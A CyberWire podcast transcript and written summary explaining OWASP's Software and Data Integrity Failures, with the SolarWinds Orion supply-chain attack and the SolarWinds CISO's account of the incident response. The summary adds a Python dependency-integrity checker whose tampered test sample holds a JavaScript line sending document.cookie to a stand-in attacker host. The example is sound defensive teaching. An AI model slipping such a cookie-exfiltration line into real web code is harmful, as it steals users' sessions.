A
You're listening to the CyberWire network, powered by N2K. And now a word from our sponsor, ThreatLocker. Keeping your system secure shouldn't mean constantly reacting to threats. ThreatLocker helps you take a different approach by giving you full control over what software can run in your environment. If it's not approved, it doesn't run. Simple as that. It's a way to stop ransomware and other attacks before they start, without adding extra complexity to your day. See how ThreatLocker can help you lock down your environment at www.threatlocker.com.
B
The word is: OWASP Software and Data Integrity Failures. Spelled: O for Open, W for Web, A for Application, S for Security, P for Project; software, for instructions that tell a computer what to do; data, for information stored on a computer; and integrity failures, for support structures that are supposed to be sound but turn out to be faulty: code and data repositories that don't protect against unauthorized changes.

Example sentence: Software and data integrity failures happen when an application relies upon plugins, libraries, or modules from untrusted resources, repositories, and content delivery networks, or CDNs.

Origin and context: Dave Wichers and Jeff Williams, working for Aspect Security, a software consulting company, published an education piece in 2003 on the top software security coding issues of the day that eventually turned into the OWASP Top 10, a reference document describing the most critical security concerns for web applications. Today, OWASP is an international team of security professionals led by the foundation executive director and Top 10 project leader Andrew van der Stock. In 2021, the committee created a new category called Software and Data Integrity Failures and listed it at the number 8 position. The main idea is to protect code and data sources from unauthorized and undetected change.

OWASP pundits have cited the 2020 SolarWinds compromise as the perfect example of this kind of failure. In that attack campaign, hacker group APT29, also known as Nobelium, compromised the SolarWinds network, found the company's code repository, and inserted a Remote Access Trojan, or RAT, into the SolarWinds Orion product, a commercial network management system. When some 18,000 customers downloaded the next software update for the Orion product, they also downloaded the RAT.

OWASP recommends several mitigation tactics to defeat this kind of attack vector:

1. Sign internally developed software, and insist that the commercial and open source software you use does the same.
2. Verify that you're only using code libraries from trusted repositories.
3. Scan internally developed and open source software for known vulnerabilities.
4. Establish a review process for code and configuration changes.
5. Enforce segregation, configuration, and access controls on your continuous integration/continuous deployment pipeline.

In the aftermath of the APT29 attacks, the SolarWinds CISO, Tim Brown, rolled out a new software design strategy he called Secure by Design that incorporates many of the OWASP recommendations. But I want to be clear here: none of these mitigation strategies, if implemented by any of the 18,000 SolarWinds customers, would have protected them from the APT29 attack. From their view, the attack is a supply chain attack from a trusted vendor. Their best bet to reduce the probability of supply chain risk is to pursue a robust zero trust strategy by severely limiting permissions and access by the Orion product. On the other hand, the OWASP recommendations are for those organizations who build their own software intended for both external and perhaps internal use, like SolarWinds.

Nerd reference: In November 2021, MJ Shoer, the Senior Vice President and Executive Director at the CompTIA ISAO, hosted Tim Brown, the SolarWinds CISO, to discuss the APT29 attack. This clip is Tim describing his response in the initial hours after the attack notification.
C
December 12th. So it was a Saturday. Our CEO got a call from Kevin Mandia, who said, hey, we believe that you've shipped tainted code. Of course, I got a call very quickly after that, and then got a call with the CTO for FireEye. We went through details very quickly. We realized that, yes, that's the case. So we started marshaling people together and started working on, kind of, the response. This one was different in that we didn't need to do a lot of research to determine, hey, this was real, right? It was like, boom, got it, it's real. We started pulling the right people together on Saturday, and the right people together is kind of interesting, right? So that included our legal team. We have DLA Piper as external legal counsel. I learned afterwards that they're the largest legal firm in the world, but they came in with their forensics team. With them, we brought in CrowdStrike to start, really, a, you know, macro investigation of the environment, and start doing that. So this was all on Saturday, as we're going through stuff, first on the phone. Sunday morning we were all in the office and started in a war room, just working through all of the details, because as a public company, on Monday morning or Sunday night, we needed to get information out to essentially the street. So a 10-K had to get filed. So timelines were just really compressed. FireEye was planning to be public with their information on Sunday, so there was a lot to do in those first 24 hours.
B
Word Notes is written by Nyla Gennaoui, executive produced by Peter Kilpe, and edited by John Petrik and me, Rick Howard. The mix, sound design, and original music have all been crafted by the ridiculously talented Elliott Peltzman. Thanks for listening.
A
And now a word from our sponsor, SpyCloud. Identity is the new battleground, and attackers are exploiting stolen identities to infiltrate your organization. Traditional defenses can't keep up. SpyCloud's holistic identity threat protection helps security teams uncover and automatically remediate hidden exposures across your users, from breaches, malware, and phishing, to neutralize identity-based threats like account takeover, fraud, and ransomware. Don't let invisible threats compromise your business. Get your free corporate darknet exposure report at spycloud.com/cyberwire and see what attackers already know. That's spycloud.com/cyberwire.
Podcast Summary: Hacking Humans
Episode: OWASP Software and Data Integrity Failures (noun) [Word Notes]
Host/Author: N2K Networks
Release Date: June 10, 2025
In this episode of Hacking Humans, hosted by N2K Networks, the focus centers on OWASP Software and Data Integrity Failures—a critical topic in the realm of cybersecurity. The discussion delves into the intricacies of software and data integrity, exemplified by high-profile cyber attacks, and explores robust mitigation strategies recommended by OWASP (Open Web Application Security Project).
Speaker B begins by unpacking the acronym OWASP, breaking it down as follows: O for Open, W for Web, A for Application, S for Security, and P for Project.
He further explains that Software refers to the instructions that tell a computer what to do, while Data pertains to information stored on a computer. Integrity Failures are support structures that are supposed to be sound but turn out to be faulty: code and data repositories that do not protect against unauthorized changes.
Notable Quote:
"Software and data integrity failures happen when an application relies upon plugins, libraries, or modules from untrusted resources, repositories, and content delivery networks."
— Speaker B [01:30]
Historical Context and OWASP's Evolution:
Speaker B traces the OWASP Top 10 back to a 2003 education piece by Dave Wichers and Jeff Williams of Aspect Security on the top software security coding issues of the day. OWASP is now an international team of security professionals led by foundation executive director and Top 10 project leader Andrew van der Stock. In 2021 the committee added the new category Software and Data Integrity Failures at the number 8 position.
OWASP experts cite the 2020 SolarWinds compromise as a quintessential example of software and data integrity failure. In this incident, APT29 (also known as Nobelium) compromised the SolarWinds network, located the company's code repository, and inserted a Remote Access Trojan (RAT) into the Orion network management product; some 18,000 customers then downloaded the RAT along with the next Orion software update.
Notable Quote:
"The main idea is to protect code and data sources from unauthorized and undetected change."
— Speaker B [03:45]
To counteract such sophisticated supply chain attacks, OWASP recommends the following five mitigation tactics:
Code Signing: Sign internally developed software, and insist that the commercial and open source software you use is signed as well.
Trusted Repositories: Verify that only code libraries from trusted repositories are used.
Vulnerability Scanning: Scan internally developed and open source software for known vulnerabilities.
Review Processes: Establish a review process for code and configuration changes.
Segregation and Access Controls: Enforce segregation, configuration, and access controls on the continuous integration/continuous deployment (CI/CD) pipeline.
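The first two tactics reduce, at build or page-load time, to one mechanical check: compare the bytes you are about to run against a digest recorded when that artifact was reviewed. The Python below is an added example written for this summary, not code from OWASP, SolarWinds, or the podcast; the sample artifacts, the lockfile entries, and the names greet.js and toolkit-1.0-py3-none-any.whl are constructed for illustration. It computes the Subresource Integrity value a browser checks for a CDN script, verifies lockfile-style sha256 pins, and refuses unpinned or altered dependencies:

```python
import base64
import hashlib
import hmac


class IntegrityError(Exception):
    """Raised when a dependency is unpinned or its bytes do not match its pin."""


def sri_value(content: bytes, algo: str = "sha384") -> str:
    """Return a Subresource Integrity string ('<algo>-<base64 digest>') for a
    script or stylesheet body. This is the form an HTML <script integrity="...">
    attribute carries so the browser refuses a CDN file that has been altered."""
    if algo not in ("sha256", "sha384", "sha512"):
        raise ValueError("SRI permits only sha256, sha384 or sha512")
    digest = hashlib.new(algo, content).digest()
    return algo + "-" + base64.b64encode(digest).decode("ascii")


def verify_integrity(content: bytes, pin: str) -> bool:
    """Compare content against a pinned digest.

    Two pin formats are accepted: SRI style 'sha384-<base64>' and lockfile
    style 'sha256:<hex>' (the shape pip --require-hashes and npm lockfiles
    use). The comparison is constant-time, so a mismatch cannot be probed
    byte by byte.
    """
    if ":" in pin:
        algo, _, expected_hex = pin.partition(":")
        actual = hashlib.new(algo, content).hexdigest()
        return hmac.compare_digest(actual.encode("ascii"),
                                   expected_hex.lower().encode("ascii"))
    if "-" in pin:
        algo, _, expected_b64 = pin.partition("-")
        actual = hashlib.new(algo, content).digest()
        return hmac.compare_digest(actual, base64.b64decode(expected_b64))
    raise ValueError(f"unrecognised pin format: {pin!r}")


def load_dependency(name: str, content: bytes, lockfile: dict) -> bytes:
    """Gate for third-party code: refuse anything that is not pinned, and refuse
    anything whose bytes no longer match the pin recorded at review time."""
    if name not in lockfile:
        raise IntegrityError(f"{name}: no pinned digest, refusing unpinned dependency")
    if not verify_integrity(content, lockfile[name]):
        raise IntegrityError(f"{name}: digest mismatch, artifact differs from reviewed version")
    return content


# Constructed sample artifacts (not real CDN or registry files).
REVIEWED_JS = b"export function greet(n) { return 'hello ' + n; }\n"
REVIEWED_WHEEL = b"PK\x03\x04 constructed stand-in for a reviewed package archive"
# A tampered copy: the reviewed script with an exfiltration line appended.
TAMPERED_JS = REVIEWED_JS + b"fetch('https://attacker.invalid/?c=' + document.cookie);\n"

# The lockfile is generated once from the artifacts that were actually reviewed
# and committed to the repository; later builds verify against these pins.
LOCKFILE = {
    "greet.js": sri_value(REVIEWED_JS),  # CDN script, SRI form
    "toolkit-1.0-py3-none-any.whl": "sha256:" + hashlib.sha256(REVIEWED_WHEEL).hexdigest(),
}


def demo() -> dict:
    """Run the gate over four cases and return the outcome for each label:
    reviewed files load; a tampered file and an unpinned file are rejected."""
    cases = [
        ("reviewed-js", "greet.js", REVIEWED_JS),
        ("reviewed-wheel", "toolkit-1.0-py3-none-any.whl", REVIEWED_WHEEL),
        ("tampered-js", "greet.js", TAMPERED_JS),
        ("unpinned", "leftpad.js", b"module.exports = s => s;"),
    ]
    outcomes = {}
    for label, name, content in cases:
        try:
            load_dependency(name, content, LOCKFILE)
            outcomes[label] = "loaded"
        except IntegrityError as exc:
            outcomes[label] = "rejected: " + str(exc)
    return outcomes


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:15} {outcome}")
```

Pins are produced once from the reviewed artifact and committed alongside the code, so a later swap of the file in the repository or on the CDN fails the check before it runs. A digest pin is not a substitute for a signature: it proves the bytes match what was reviewed, not who produced them, which is why OWASP lists signing as a separate tactic.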
Notable Quote:
"None of these mitigation strategies, if implemented by any of the 18,000 SolarWinds customers, would have protected them from the APT29 attack."
— Speaker B [04:30]
Despite the robust recommendations, the SolarWinds attack underscores the challenges of supply chain security, highlighting the importance of a zero trust strategy that minimizes permissions and access privileges related to critical products like Orion.
A pivotal segment features Tim Brown, SolarWinds' Chief Information Security Officer (CISO), detailing the immediate response following the APT29 attack notification. Recorded during an interview hosted by MJ Shoer of the CompTIA ISAO in November 2021, Tim Brown recounts the urgent measures taken in the critical first 24 hours.
Key Points from Tim Brown:
Immediate Notification and Coordination: On Saturday, December 12th, the SolarWinds CEO got a call from Kevin Mandia saying FireEye believed SolarWinds had shipped tainted code; Brown was called shortly after, spoke with FireEye's CTO, and the company confirmed very quickly that the report was real.
Assembling the Response Team: External legal counsel DLA Piper came in with its forensics team, and CrowdStrike was brought in to begin a broad investigation of the environment, all on the Saturday.
Establishing a War Room: By Sunday morning the team was in the office working through the details in a war room, under pressure to file a public disclosure before markets opened Monday and ahead of FireEye's own planned Sunday announcement.
Notable Quote:
"This was all on Saturday, as we're going through stuff first on the phone. Sunday morning we were all in the office and started in a war room just working through all of the details because as a public company on Monday morning or Sunday night, we needed to get information out to essentially the street."
— Tim Brown [05:45]
Tim emphasizes the unprecedented speed and coordination required to manage the fallout from the attack, illustrating the high-stakes environment of responding to a major security breach.
This episode of Hacking Humans provides a comprehensive examination of OWASP's Software and Data Integrity Failures, using the SolarWinds APT29 attack as a case study to highlight vulnerabilities in the software supply chain. By outlining OWASP’s mitigation strategies and featuring firsthand insights from SolarWinds' CISO, the podcast underscores the critical importance of robust security practices and proactive defense mechanisms in safeguarding against sophisticated cyber threats.
For organizations building their own software, OWASP’s guidelines serve as essential practices to prevent unauthorized and undetected changes, thereby enhancing the integrity and security of their applications and data.
This summary was crafted to encapsulate the key discussions and insights from the podcast episode, providing a detailed overview for those who have not listened to the original content.